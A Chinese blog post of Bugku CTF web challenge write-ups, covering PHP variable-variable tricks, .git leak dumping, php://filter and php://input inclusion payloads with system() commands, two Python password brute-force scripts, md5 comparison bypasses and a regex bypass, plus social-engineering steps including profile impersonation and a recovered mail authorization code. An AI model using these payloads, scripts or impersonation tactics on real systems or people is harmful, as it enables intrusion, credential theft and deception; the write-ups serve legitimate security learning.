<!DOCTYPE HTML>
<html lang="en">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="bugku-2, 黛色若梦">
    <meta name="description" content="A Freshman">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>bugku-2 | 黛色若梦</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="黛色若梦" type="application/atom+xml">
</head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">黛色若梦</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>Index</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>Tags</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>Categories</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>Archives</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>About</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>Contact</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>Friends</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="Search" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">黛色若梦</div>
        <div class="logo-desc">
            
            A Freshman
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			Index
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			Tags
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			Categories
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			Archives
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			About
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			Contact
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			Friends
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/blinkfox/hexo-theme-matery" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/blinkfox/hexo-theme-matery" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/19.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">bugku-2</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/ctf%E9%A2%98%E7%9B%AE-web/">
                                <span class="chip bg-color">ctf题目--web</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>Publish Date:&nbsp;&nbsp;
                    2022-02-03
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">

        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="bugku-2"><a href="#bugku-2" class="headerlink" title="bugku-2"></a>bugku-2</h1><h3 id="周二："><a href="#周二：" class="headerlink" title="周二："></a>周二：</h3><h4 id="14-头等舱"><a href="#14-头等舱" class="headerlink" title="14.头等舱"></a>14.头等舱</h4><p><img src="/images/%E5%A4%B4%E7%AD%89%E8%88%B1.png" alt="头等舱"></p>
<h4 id="15-变量1"><a href="#15-变量1" class="headerlink" title="15.变量1"></a>15.变量1</h4><p>提示说flag在变量里面，经分析只要运行 eval(“var_dump($$<a target="_blank" rel="noopener" href="https://so.csdn.net/so/search?q=args&spm=1001.2101.3001.7020">args</a>);”);，falg很有可能就会出来</p>
<p>flag In the variable !</p>
<p><code>&lt;?php</code> </p>
<p><code> error_reporting(0);</code> //关闭php错误显示</p>
<p>  <code> include &quot;flag1.php&quot;;</code>//引入flag1.php文件代码 </p>
<p>  <code>highlight_file(__file__);  </code></p>
<p><code>//对文件进行语法高亮</code>显示</p>
<p>  <code>if(isset($_GET[&#39;args&#39;]))&#123;  </code></p>
<p><code>//条件判断url中get方法传递的args参数 是否存在</code></p>
<p><code> $args = $_GET[&#39;args&#39;];</code></p>
<p>//将get赋值的args赋值给变量$args</p>
<p>  <code> if(!preg_match(&quot;/^\w+$/&quot;,$args))&#123;   </code>  </p>
<p>  // 正则表达式：   /^开始, \w表示任意一个单词字符，即[a-zA-Z0-9_] ,+将前面的字符匹配一次或多次，$/结尾</p>
<p> die(“args error!”);  ` //输出args error</p>
<p>  <code>&#125; </code> </p>
<p>  <code> eval(&quot;var_dump($$args);&quot;);</code> </p>
<p><code> &#125;</code> //此函数显示一个或多个表达式的信息，包括表达式的类型与值。</p>
<p>  <code>?&gt; </code></p>
<p><strong>补充语法</strong>：eval（）用来执行括号里面的内容</p>
<p>var_dump()：输出括号里面的详细内容，包括内容，类型等等。</p>
<p><strong>可变变量</strong>：允许动态改变一个变量名称，原理是变量的名称由另一个变量的值来确定，即一个可变变量获取了一个普通变量的值作为这个可变变量的变量名，实现过程是在变量前面多加美元符号</p>
<p><strong>全局变量</strong>：$GLOBALS是PHP的预定义超全局的，这意味着他们在一个脚本的全部作用域中都可以用。在函数或方法中无需执行global $variable就可以访问它们。</p>
<p>这些超全局变量是：</p>
<p>$GLOBALS</p>
<p>$_SERVER</p>
<p>$_REQUEST</p>
<p>$_POST</p>
<p>$_GET</p>
<p>$_FILES</p>
<p>$_ENV</p>
<p>$COOKIE</p>
<p>$_SESSION</p>
<p>$GLOBALS这种全局变量用于在php脚本的任意位置访问全局变量（从函数或方法中皆可）</p>
<p>所以我们构造padload</p>
<p><img src="/images/%E5%8F%98%E9%87%8F%E4%B8%80.png" alt="变量一"></p>
<p>$$args====&gt;我们可以猜想$args很有可能是一个数组，应该想到的就是超全局变量$GLOBALS</p>
<p>他是用存储全局变量的，全局变量的值在这个超级全局变量里面是一个键值，先当于hashmap的键值对</p>
<p>全局变量可以通过变量名在$GLOBALS找到相对应的值。</p>
<h4 id="16-社工-初步收集"><a href="#16-社工-初步收集" class="headerlink" title="16.社工-初步收集"></a>16.社工-初步收集</h4><p>没有方向，看看wp。</p>
<p>这种题目一般本能反应是要扫路径，f12没找到什么。然后抓包试试看也没什么，在路径中看到隐藏的。用御剑扫描了一下目录发现管理员登录入口。</p>
<p>这题也好好玩:</p>
<p>首先可以扫出一个管理登录界面，然后我们就要想想要怎么得到账户密码。</p>
<p>所以我们再回来网页四处寻找，发现有压缩包还可以下载，所以就想压缩包下载下来发现可以 输入账号密码，然后就被耍了。。。排除暴力破解。这里用到新的方法抓包，之前都是bp抓包抓网页的，但是现在用wireshark，可以抓数据流量包。</p>
<p>开抓包，随便发一个账号密码，然后停止捕获：</p>
<p><img src="/images/%E7%A4%BE%E5%B7%A5%E5%88%9D%E6%AD%A5.png" alt="社工初步"></p>
<p>发现smtp协议，这是电子邮件传输的协议。</p>
<p><em><strong>基本概念<br> SMTP（Simple Mail Transfer  Protocol）即简单邮件传输协议,它是一组用于由源地址到目的地址传送邮件的规则，由它来控制信件的中转方式。SMTP协议属于TCP/IP协议簇，它帮助每台计算机在发送或中转信件时找到下一个目的地。通过SMTP协议所指定的服务器,就可以把E-mail寄到收信人的服务器上了，整个过程<br> 只要几分钟。SMTP服务器则是遵循SMTP协议的发送邮件服务器，用来发送或中转发出的电子邮件。SMTP<br> 是一种TCP协议支持的提供可靠且有效电子邮件传输的应用层协议。</strong></em></p>
<p><strong>输入账户和密码发现密码不正确，但是确实是邮箱登录，就用QQ邮箱登录试试，但是电脑邮箱也没法登录，但一定是邮箱</strong><br> <strong>邮箱登录的方式，主流是两种，一种是密码登录，一种是授权码登录，官网提供的邮箱登录一般是账号+密码登录，第三方邮件系统登录的一般都是账号+授权码登录。</strong></p>
<p>然后常规base64 解码user：<a href="mailto:&#x62;&#x75;&#x67;&#107;&#117;&#107;&#117;&#64;&#49;&#54;&#x33;&#46;&#x63;&#x6f;&#109;">&#x62;&#x75;&#x67;&#107;&#117;&#107;&#117;&#64;&#49;&#54;&#x33;&#46;&#x63;&#x6f;&#109;</a></p>
<p>和password：XSLROCPMNWWZQDZL</p>
<p>其实from就是提示用户了。</p>
<p>这里要用手机登录，我试过了这是授权码。</p>
<p>登上去时文件已经被删了，原文是这样的</p>
<p><img src="/images/%E7%A4%BE%E5%B7%A5%E5%88%9D%E6%AD%A53.png" alt="社工初步3"></p>
<p>一般的社工的密码是提示生日的所以。。20010206密码</p>
<p>账户 mara</p>
<p><img src="/images/%E7%A4%BE%E5%B7%A5%E5%88%9D%E6%AD%A54.png" alt="社工初步4"></p>
<h3 id="周三："><a href="#周三：" class="headerlink" title="周三："></a>周三：</h3><h4 id="17-bp"><a href="#17-bp" class="headerlink" title="17.bp"></a>17.bp</h4><p>根据题目题目提示我们找到top1000弱口令，然后爆破发现返回长度一样，观察到响应包里面的错误包里面都会返回一个JavaScript代码告知我们的密码有错误，所以我们通过Burpsuite的 （Grep – Match 在响应中找出存在指定的内容的一项。）过滤掉存在JavaScript代码中的{code:  ‘bugku10000’}的数据包</p>
<p><img src="/images/14.3-16437914683281.png" alt="14.3"></p>
<p><img src="/images/14-16437914800922.png" alt="14"></p>
<p><img src="/images/14.1-16437914838303.png" alt="14.1"></p>
<p><img src="/images/17-16437915095005.png"></p>
<p><img src="/images/14.2-16437914915114.png" alt="14.2"></p>
<h4 id="18社工—伪造"><a href="#18社工—伪造" class="headerlink" title="18社工—伪造"></a>18社工—伪造</h4><p>社工的题目就是有意思。</p>
<p>发现与真实的qq是关联的，然后输入flag又说要他男友的才能给，所以我们就伪装修改id和头像之类的<img src="/images/18-16437944155986.png" alt="18"></p>
<h4 id="19-source"><a href="#19-source" class="headerlink" title="19.source"></a>19.source</h4><p>描述：我哥说渗透我只用linux环境                            </p>
<p>所以猜想是不是要敲linux命令行。看源代码里面有两个信息，flag那个看着像是加密的，但是实际上解不出来，是假的。而还有一个git，是一个漏洞，所以我们开kali看看。</p>
<p>之前我下载的kali随着360卸载文件都没了，所以我又花了一个傍晚的时间捣腾重新下载，切记小心行事，太麻烦了。。</p>
<p>打开kali扫描，用的是gropher 来扫描。这里直接扫出了git，这里利用git漏洞。扫描的命令gobuster dir -u http://网址-w /usr/share/wordlists/dirb/common.txt</p>
<p><img src="/images/19-16438108631697.png" alt="19"></p>
<p>这里将git文件下载，<strong>wget -r <a target="_blank" rel="noopener" href="http://114.67.175.224:10529//.git">http://114.67.175.224:10529//.git</a></strong></p>
<p>然后在文件管理的user里打开下载后的文件夹目录，打开终端然后git reflog，然后用<strong>git show</strong>+文件名 一个一个试</p>
<p><img src="/images/19.1.png" alt="19.1"></p>
<h4 id="20-源代码"><a href="#20-源代码" class="headerlink" title="20.源代码"></a>20.源代码</h4><p><img src="/images/20-16438141790209.png" alt="20"></p>
<p>unescape() 函数对编码的字符串进行解码，所以我们解码。</p>
<p>扔进去url解码得到：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">var pi=function checkSubmit()&#123;var a=document.getElementById(&quot;password&quot;);if(&quot;undefined&quot;!=typeof a)&#123;if(&quot;67d709b2b&#x27;;</span><br><span class="line">var p2 = &#x27;aa648cf6e87a7114f1&quot;==a.value)return!0;alert(&quot;Error&quot;);a.focus();return!1&#125;&#125;document.getElementById(&quot;levelQuest&quot;).onsubmit=checkSubmit;&#x27;;</span><br><span class="line">eval(unescape(p1) + unescape(&#x27;54aa2&#x27; + p2));</span><br></pre></td></tr></table></figure>

<p>整理得：</p>
<p>function checkSubmit(){</p>
<p>var a=document.getElementById(“password”);</p>
<p>if(“undefined”!=typeof a){</p>
<p>if(“67d709b2b54aa2aa648cf6e87a7114f1”==a.value)</p>
<p>return!0;</p>
<p>alert(“Error”);</p>
<p>a.focus();</p>
<p>return!1}}</p>
<p>document.getElementById(“levelQuest”).onsubmit=checkSubmit;’</p>
<p>所以值分析出来就是67d709b2b54aa2aa648cf6e87a7114f1，submit后为</p>
<p><img src="/images/20.1.png" alt="20.1"></p>
<h4 id="21-文件包含"><a href="#21-文件包含" class="headerlink" title="21.文件包含"></a>21.文件包含</h4><p>参考博客<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_51553814/article/details/118693425?utm_medium=distribute.pc_relevant.none-task-blog-2~default~baidujs_title~default-0.pc_relevant_paycolumn_v3&amp;spm=1001.2101.3001.4242.1&amp;utm_relevant_index=3">https://blog.csdn.net/qq_51553814/article/details/118693425?utm_medium=distribute.pc_relevant.none-task-blog-2~default~baidujs_title~default-0.pc_relevant_paycolumn_v3&amp;spm=1001.2101.3001.4242.1&amp;utm_relevant_index=3</a></p>
<p>原理：<br>在开发过程中，当频繁需要跳转网页，或者需要某个函数时，程序员喜欢将重复的函数写道一个单独的文件中，在需要时调用文件，这种文件调用叫做文件包含</p>
<p>文件调用可以使代码更简介，同时使用代码更方便、更快速，但同时也带来的对应的漏洞</p>
<p>当调用的不是函数，而是一个文件时，就相当于把这个文件变了变量，也就给了用户操控参数的机会，就可能造成文件包含漏洞</p>
<p>文件包含漏洞的掌握还是要有实战才能会运用。?file=XXX.php等是典型的文件包含，题目页面显示了index.php,首先在url后面改为?file=index.php看看，发现不能进入这个页面。</p>
<h6 id="PHP伪协议（文件读取）"><a href="#PHP伪协议（文件读取）" class="headerlink" title="PHP伪协议（文件读取）"></a>PHP伪协议（文件读取）</h6><p><strong>之后就想到文件包含可以使用PHP伪协议，php://filter可以获取指定文件源码。当它与包含函数结合时，php://filter流会被当作php文件执行。所以我们一般对其进行编码，让其不执行。从而导致 任意文件读取。</strong>之前在dvwa靶场里没有很仔细得讲明白所以这里再讲一遍。</p>
<h6 id="1-php-fileter"><a href="#1-php-fileter" class="headerlink" title="1.php://fileter"></a>1.php://fileter</h6><p><img src="/images/21-164381661956611.png" alt="21"></p>
<p>可以读取目标文件的内容，由于读取时一些代码不能显现，所以我们通常用base64加密再解密。</p>
<p>#第一种用法:<br>?file=php://filter/convert.base64-encode/resouce=xxx.php?<br>第二种用法:<br>?file=php://filter/read=convert.base64-encode/resource=xxx.php<br>————————————————</p>
<h6 id="2-php-input"><a href="#2-php-input" class="headerlink" title="2.php://input"></a>2.php://input</h6><p>可以将post请求当做代码来用，有限制条件：php &lt;5.0 ，allow_url_include=Off 情况下也可以用</p>
<p>php &gt; 5.0，只有在allow_url_fopen=On 时才能使用</p>
<p>代码：?file=php://input<br>在url上后接，之后利用Hackbar通过POST把数据传过去</p>
<p>用法：<br> 1.写入木马如在POST中输入</p>
<?php system("dir")?>

<?php system("ls") ?>

<?php system('cat flag.php') ?>

<p>#查询全部目录文件<br><?php 
    $file=fopen("flag.php","w");
    echo  fputs($file,"Hello World");
    fclose($file);
?><br>#以写入方式打开某某文件文件,如果没有就新创建一个</p>
<hr>
<p>这题是利用伪协议的知识点：文件包含 配合 伪协议 读取敏感文件</p>
<p>?file=php://filter/read=convert.base64-encode/resource=index.php</p>
<p><img src="/images/21.1-164381668541212.png" alt="21.1"></p>
<h3 id="周四："><a href="#周四：" class="headerlink" title="周四："></a>周四：</h3><h4 id="22-好像需要密码"><a href="#22-好像需要密码" class="headerlink" title="22.好像需要密码"></a>22.好像需要密码</h4><p>翻来翻去没什么特殊的，所以我只想到爆破。。</p>
<p>看了wp这题既可以用爆破，同时我在网上看到有师傅的python脚本，所以我们用两种方法做一下。</p>
<p>配置新的环境了</p>
<p><img src="/images/22-16438946585691.png" alt="22"></p>
<p><img src="/images/22.1.png" alt="22.1"></p>
<p>1.先贴一下网上的脚本</p>
<p>（1）mima-py</p>
<p>5wei.py</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">import urllib</span><br><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line">import threading</span><br><span class="line">#from bs4 import BeautifulSoup</span><br><span class="line"></span><br><span class="line"># 1.密码生成</span><br><span class="line">print(&quot;请输入纯数字密码位数：&quot;)</span><br><span class="line">input_len = input()</span><br><span class="line"></span><br><span class="line">min_num = 10000</span><br><span class="line">max_num = &#x27;9&#x27; * (int(input_len))</span><br><span class="line">passwords_list = []</span><br><span class="line"></span><br><span class="line">for i in range(min_num,int(max_num)+1):</span><br><span class="line">    if len(str(i)) &lt; int(input_len):</span><br><span class="line">        i = &#x27;0&#x27; * (int(input_len)-len(str(i)))+str(i)</span><br><span class="line">    passwords_list.append(i)</span><br><span class="line"></span><br><span class="line">print(&quot;密码生成完毕!&quot;)</span><br><span class="line"></span><br><span class="line"># 2.将生成的密码带入进行测试</span><br><span class="line">for password in passwords_list:</span><br><span class="line">    test = requests.post(&#x27;http://114.67.175.224:18454/&#x27;,data=&#123;&#x27;pwd&#x27;: password&#125;)</span><br><span class="line">    print(&#x27;当前测试的密码为：&#x27;)</span><br><span class="line">    print(password)</span><br><span class="line">    #time.sleep(0.5)   #此处的延时可加可不加</span><br><span class="line">    if &#x27;flag&#x27; in test.text:</span><br><span class="line">        print(&#x27;正确的密码为：&#x27;)</span><br><span class="line">        print(password)</span><br><span class="line">        break</span><br><span class="line"></span><br><span class="line">print(&#x27;执行完毕！&#x27;)</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">#new.py</span><br><span class="line">import requests</span><br><span class="line"> </span><br><span class="line">def ssh():</span><br><span class="line">    url = &quot;http://114.67.246.176:18966/&quot;</span><br><span class="line">    for pwd in range(10000,100000):</span><br><span class="line">        pwd = str(pwd)</span><br><span class="line">        r = requests.post(url, data=&#123;&#x27;pwd&#x27;: pwd&#125;)</span><br><span class="line">        r.encoding = &#x27;utf-8&#x27;</span><br><span class="line">        r_text = r.text</span><br><span class="line">        judge = &quot;密码不正确，请重新输入&quot;</span><br><span class="line">        if (judge in r.text):</span><br><span class="line">            print(&quot;尝试密码：&#123;&#125;,反应状态码：&#123;&#125;,密码错误.&quot;.format(pwd, r))</span><br><span class="line">        else:</span><br><span class="line">            print(&quot;尝试密码：&#123;&#125;,反应状态码：&#123;&#125;,密码正确.&quot;.format(pwd, r))</span><br><span class="line">            print(&quot;爆破完成&quot;)</span><br><span class="line">            break</span><br><span class="line"> </span><br><span class="line">ssh()</span><br></pre></td></tr></table></figure>

<p>2.爆破.但这里线程要大，不然太慢，用专业版。</p>
<h4 id="23-备份是个好习惯"><a href="#23-备份是个好习惯" class="headerlink" title="23.备份是个好习惯"></a>23.备份是个好习惯</h4><p>首页是一字符串：d41d8cd98f00b204e9800998ecf8427ed41d8cd98f00b204e9800998ecf8427e</p>
<p>是两串一模一样的字符连接在一起的。</p>
<p>然后联系题目我们想到了：bak后缀名，下载下来</p>
<p><img src="/images/23-16438946780672.png" alt="23"></p>
<?php
/**
 * Created by PhpStorm.
 * User: Norse
 * Date: 2017/8/6
 * Time: 20:22
*/

include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');
$str = substr($str,1);
$str = str_replace('key','',$str);#过滤了key和空格
parse_str($str);
echo md5($key1);

echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){
    echo $flag."取得flag";
}
?>

<p>所以我们找到绕过方法：</p>
<p>一种是md5()函数无法处理数组，所以我们传入数组，会返回NULL，所以两个数组经过加密后得到的都是NULL，也就是相等的。</p>
<p>所以我们可以试试kkeyey1[]=some&amp;kekeyy2[]=lie</p>
<p>另一种就是之前常用的利用==弱比较，我们常用的两个字符经过MD5加密后的值为0exxxx形式，会被认为是科学计数法，且表示的是0*10的xxx次方，还是零，都是相等的。</p>
<p>可以套一些</p>
<p>下列的字符串的MD5值都是0e开头的：</p>
<p>QNKCDZO</p>
<p>240610708</p>
<p>s878926199a</p>
<p>s155964671a</p>
<p>s214587387a</p>
<p>s214587387a</p>
<p><img src="/images/23.1.png" alt="23.1"></p>
<p><img src="/images/23.2.png" alt="23.2"></p>
<h4 id="24-No-one-knows-regex-better-than-me"><a href="#24-No-one-knows-regex-better-than-me" class="headerlink" title="24.No one knows regex better than me"></a>24.No one knows regex better than me</h4><p>参考博客：<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_51652864/article/details/115418817">https://blog.csdn.net/qq_51652864/article/details/115418817</a></p>
<p>[(39条消息) <a target="_blank" rel="noopener" href="https://blog.csdn.net/DARKNOTES/article/details/114360112">WP-Bugku积累-正则bypasss] No one knows regex better than me_車鈊的博客-CSDN博客</a></p>
<p>很有意思的一道逻辑题：</p>
<p>得到这串代码：审计一下</p>
<?php 
error_reporting(0);
$zero=$_REQUEST['zero'];
$first=$_REQUEST['first'];
$second=$zero.$first;
if(preg_match_all("/Yeedo|wants|a|girl|friend|or|a|flag/i",$second)){
    $key=$second;
    if(preg_match("/\.\.|flag/",$key)){
        die("Noooood hacker!");
    }else{
        $third=$first;
        if(preg_match("/\\|\056\160\150\x70/i",$third)){
            $end=substr($third,5);
            highlight_file(base64_decode($zero).$end);//maybe flag in flag.php
        }
    }
}
else{
    highlight_file(__FILE__);
}

------

**补充知识点**

**preg_match 与 preg_match_all 两个函数**的区别就是：preg_match_all()搜索匹配全部情况；preg_match()搜索匹配到一个后终止。

preg_match() 返回 pattern 所匹配的次数。要么是 0 次（没有匹配）或 1 次，因为 preg_match() 在第一次匹配之后将停止搜索。preg_match_all() 则相反，会一直搜索到 subject 的结尾处。如果出错 preg_match() 返回 FALSE。

**两重转义**

在正则表达式中要匹配一个反斜杠时，例如"\\\\",前后两个反斜杠在字符串中分别变成一个反斜杠，解释为两个反斜杠，再交由正则表达式解释为一个反斜杠，需要四个反斜杠。

**字符串 ----> 正则表达式字符串参数 -----> 正则解析转移后的pattern**

![24.1](/images/24.1.png)

**进制转化**

\xnn是十六进制(Hex)，\nnn是八进制（Oct）

------

